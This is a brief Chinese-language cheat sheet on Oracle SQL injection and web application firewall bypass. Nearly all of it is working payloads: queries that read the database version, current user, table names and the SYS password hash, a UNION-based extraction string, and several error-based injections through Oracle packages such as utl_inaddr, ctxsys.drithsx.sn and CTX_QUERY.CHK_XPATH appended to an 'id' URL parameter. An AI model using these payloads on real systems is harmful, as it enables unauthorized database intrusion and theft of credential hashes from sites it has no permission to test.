WAF Bypass数据库特性（Oracle探索篇）

空白字符：%00
获取数据库版本：SELECT banner FROM v$version where rownum=1

SELECT banner FROM v$version where rownum=1   //获取数据库版本
select user from dual where rownum=1          //获取当前连接数据库的用户名
select password from sys.user$ where rownum=1 and name='SYS'  //获取用户SYS密文密码
SELECT name FROM v$database                   //获取库名
select table_name from user_tables where rownum=1   //获取第一个表名

Tips：在oracle 里|| 是连接符号，但是在其他数据库里就不是
id=1 and 1=2 union select (chr(94)||chr(94)||chr(33)||(SELECT banner FROM v$version where rownum=1)||chr(33)||chr(94)||chr(94)) from dual--

?id=1 AND 1=utl_inaddr.get_host_address((SELECT name FROM v$database))—  //获取库名
?id=1 and 1=ctxsys.drithsx.sn(1,(select UTL_INADDR.get_host_address from dual where rownum=1))-- //获取数据库服务器所在ip
?id=1 and 1= CTXSYS.CTX_QUERY.CHK_XPATH((select banner from v$version where rownum=1),'a','b')--
?id=1 Or 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),'a','b')--
?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null—
?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))--